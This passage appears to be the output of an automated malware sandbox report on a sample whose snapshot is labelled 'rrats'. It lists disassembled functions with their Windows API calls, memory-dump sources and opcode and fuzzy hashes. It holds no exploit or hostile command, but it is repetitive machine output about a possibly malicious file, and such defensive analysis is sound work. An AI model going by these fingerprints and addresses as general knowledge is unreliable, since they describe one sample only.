                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                              • Instruction ID: 34b35ffb78987b836f174d5fc48e3209f09954d5739ec27d7d5b09daa75bc3cd
                                                              • Opcode Fuzzy Hash: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                              • Instruction Fuzzy Hash: A7118E30910206EBDF209F65C806B6D37B9FB43728F20892AF426C51D0D7789F44DB62
                                                              Function 00CCAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CC40EF,00000000,00000000,?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue), ref: 00CCAD66
                                                              • GetLastError.KERNEL32(?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000,00000364,?,00CC98B7), ref: 00CCAD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000), ref: 00CCAD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                              • Instruction ID: 553ae48909d9c9e812a16b72adcf0341c3d544859babc53c75bdc88cb6b9f974
                                                              • Opcode Fuzzy Hash: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                              • Instruction Fuzzy Hash: D301473260222AABC7214B79EC4CF5B7B98EF00BA67100229F817D3550DB20DD0186E2
                                                              Function 00CB101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CB1043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB108A
                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2655393344-3849766595
                                                              • Opcode ID: 9e54d7bc8c721b980e589cf4ed74b668997a7e6041e93ce2ec97dee1e35eeb41
                                                              • Instruction ID: dda9d09fb4c72039174b0027eb1aec8914a5510f2176e183392a857516f05960
                                                              • Opcode Fuzzy Hash: 9e54d7bc8c721b980e589cf4ed74b668997a7e6041e93ce2ec97dee1e35eeb41
                                                              • Instruction Fuzzy Hash: EE01FEB53443496FD334AF68AC51BBAB368EB80755F14003EFE4656180CAB168C54724
                                                              Function 00CBAE2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB1FE5
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB1FF6
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB2006
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB2014
                                                                • Part of subcall function 00CB1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                                • Part of subcall function 00CBAC04: SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                              • _wcslen.LIBCMT ref: 00CBAE8B
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00CE946A,00000006), ref: 00CBAEC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 1016385243-1246513382
                                                              • Opcode ID: e88d3757d3d330a6848d675c46594985830e2397d8614f342709029af41398c0
                                                              • Instruction ID: e6502f03bd5cc875e246e5a3bd0a55abc40e956164b8f8d8fdfe8b4c7012f3cf
                                                              • Opcode Fuzzy Hash: e88d3757d3d330a6848d675c46594985830e2397d8614f342709029af41398c0
                                                              • Instruction Fuzzy Hash: 5E015E71D0025965DF11ABA4DD0AEDF77FCAF08700F000465F506E3192E6B496449AA1
                                                              Function 00CA9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CAD343,00000001,?,?,?,00000000,00CB551D,?,?,?), ref: 00CA9F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CB551D,?,?,?,?,?,00CB4FC7,?), ref: 00CA9FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CAD343,00000001,?,?), ref: 00CAA011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                              • Instruction ID: 5575dd3a5c3a25e7b3f2a1ccbf6ee87316e5503082fc808df92a6160f1809a97
                                                              • Opcode Fuzzy Hash: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                              • Instruction Fuzzy Hash: FF31E23120434AAFDB14CF24D809B6EB7A5FF86719F04451DF99297290C775AE48CBA3
                                                              Function 00CAA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CAC27E: _wcslen.LIBCMT ref: 00CAC284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA30C
                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                              • Instruction ID: 7e0c7a03323bf1c8a32cb918d47633cd36790c9c1fbd9455507c9e8618236e69
                                                              • Opcode Fuzzy Hash: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                              • Instruction Fuzzy Hash: 6F01F7312022126AEF31AB754C49BFD3798AF0B789F044416F912E60A1D764DB81D6B7
                                                              Function 00CCB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCB8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                              • Instruction ID: 35ba1e674e64f49a5df0fc87a8aaa5edf15bbd6896036090f3d85c4e76fa07ed
                                                              • Opcode Fuzzy Hash: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                              • Instruction Fuzzy Hash: FE41F67050428C9ADF218EA5CC85FEABBB9EB45304F1404EDE5DAC6142D335AE469B60
                                                              Function 00CCAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CCAFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                              • Instruction ID: dac727fe3992756c7fb12c2f1f32220721f276d8c0dcd5f4cb405abc965d7bab
                                                              • Opcode Fuzzy Hash: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                              • Instruction Fuzzy Hash: 3B014C3250510DBBCF026F90DC05EEE7F62EF08754F01425AFE1466261C6728A31EB81
                                                              Function 00CCAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CCA56F), ref: 00CCAF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                              • Instruction ID: f8f0538449bb044e5f4bd483c9df1f43f6fcd7557c4b64606765a2899ec05608
                                                              • Opcode Fuzzy Hash: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                              • Instruction Fuzzy Hash: F5F0B43264621CBFCF026F50CC1AE9D7F61EF04711F40416AFD099A360EA314A10A786
                                                              Function 00CCADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                              • Instruction ID: 94ae5c6869b4db779ccb4566efea84c08086f339538c5e3cf6aeebcfa5f1bac9
                                                              • Opcode Fuzzy Hash: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                              • Instruction Fuzzy Hash: 91E0E532A8621C7BC601AB65DC1AF6EBB94DB04721B4102AEF90697340DD715E1196DA
                                                              Function 00CBEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBEAF9
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3Qo
                                                              • API String ID: 1269201914-1944013411
                                                              • Opcode ID: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                              • Instruction ID: 021770638c5dd6bdfd92bdb09e37d73dff09b89c870cdf214e942e098575e569
                                                              • Opcode Fuzzy Hash: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                              • Instruction Fuzzy Hash: 70B012C629B4437C3908A2061E42CF7090DC4C0F90730803FF504C41C1DC814C026471
                                                              Function 00CCBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCBA89,?,00000000), ref: 00CCBC64
                                                              • GetCPInfo.KERNEL32(00000000,00CCBA89,?,?,?,00CCBA89,?,00000000), ref: 00CCBC77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                              • Instruction ID: 977381dbbbd8e00518c623df280d3d073a3020cc2a03f5ea096720697be780e7
                                                              • Opcode Fuzzy Hash: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                              • Instruction Fuzzy Hash: 0F513470D002559EDB209FF5C892FBABBE4EF41310F1844AED4A68B292D7359E46DB90
                                                              Function 00CA9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CA9A50,?,?,00000000,?,?,00CA8CBC,?), ref: 00CA9BAB
                                                              • GetLastError.KERNEL32(?,00000000,00CA8411,-00009570,00000000,000007F3), ref: 00CA9BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                              • Instruction ID: 8326a9fa10847b2be58e35ee6c3387fa97d6c916d03bf65f0100788cebc6d5e6
                                                              • Opcode Fuzzy Hash: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                              • Instruction Fuzzy Hash: E541CF305043438FDB34DF15F5865AAB7E5FBD6718F148A2EE8A283260D770AE458B61
                                                              Function 00CCBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CC97E5: GetLastError.KERNEL32(?,00CE1098,00CC4674,00CE1098,?,?,00CC40EF,?,?,00CE1098), ref: 00CC97E9
                                                                • Part of subcall function 00CC97E5: _free.LIBCMT ref: 00CC981C
                                                                • Part of subcall function 00CC97E5: SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC985D
                                                                • Part of subcall function 00CC97E5: _abort.LIBCMT ref: 00CC9863
                                                                • Part of subcall function 00CCBB4E: _abort.LIBCMT ref: 00CCBB80
                                                                • Part of subcall function 00CCBB4E: _free.LIBCMT ref: 00CCBBB4
                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                              • _free.LIBCMT ref: 00CCBA9F
                                                              • _free.LIBCMT ref: 00CCBAD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID:
                                                              • API String ID: 2991157371-0
                                                              • Opcode ID: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                              • Instruction ID: 2ac9841de90c678c7fc9d914c852aca8e6e3e50586e18738530482f033867ee2
                                                              • Opcode Fuzzy Hash: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                              • Instruction Fuzzy Hash: 0131B631904209AFDB10EFE9D446F9DB7F5EF40320F25409EE9549B2A2EB329E45EB50
                                                              Function 00CA1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA1E55
                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                              • _wcslen.LIBCMT ref: 00CA1EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 52cf5d35fdef34b401ef253f5eca2eb5a4e9cf32667f7e0b9356782d6aebe2fa
                                                              • Instruction ID: ec4268c25746a2dc193b7fef3fca47dd43f184ae0746ea50b409f9e658b91bdf
                                                              • Opcode Fuzzy Hash: 52cf5d35fdef34b401ef253f5eca2eb5a4e9cf32667f7e0b9356782d6aebe2fa
                                                              • Instruction Fuzzy Hash: E4317A7190424AAFCF11DF98D955AEEBBF6BF09304F24006EF845A7251CB325E00DB60
